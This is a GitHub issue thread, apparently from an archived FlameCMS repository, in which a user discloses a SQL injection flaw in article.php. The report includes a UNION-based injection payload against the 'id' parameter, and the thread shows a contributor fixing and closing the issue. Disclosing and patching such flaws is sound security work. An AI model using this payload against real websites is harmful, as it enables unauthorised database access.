Skip to content
This repository has been archived by the owner on Feb 28, 2020. It is now read-only.

sql injection vulnerability #24

Closed
blackjliuyun opened this issue Oct 16, 2019 · 4 comments
Closed

sql injection vulnerability #24

blackjliuyun opened this issue Oct 16, 2019 · 4 comments

Comments

@blackjliuyun
Copy link

hello
There is a sql injection vulnerability here:
FlameCMS-master/article.php
image

http://127.0.0.1:8888/FlameCMS-master/article?id=1
image

payload:
id=-3521' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178766271,0x7849574d434964786d6d53677a775679504d4e506c7563456d516b75474f634652545662506a5073,0x71767a6271),NULL,NULL-- auYF

@tlcd96
Copy link
Contributor

tlcd96 commented Oct 16, 2019

thanks i'll solve it now, since there's no one else to solve it (not my repo)

@tlcd96
Copy link
Contributor

tlcd96 commented Oct 16, 2019

Hi, can you check if it's solved now? a90be30

@blackjliuyun
Copy link
Author

Hi, can you check if it's solved now? a90be30

Yes, this can be solved

@tlcd96
Copy link
Contributor

tlcd96 commented Oct 17, 2019

thks

@tlcd96 tlcd96 closed this as completed Oct 17, 2019
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants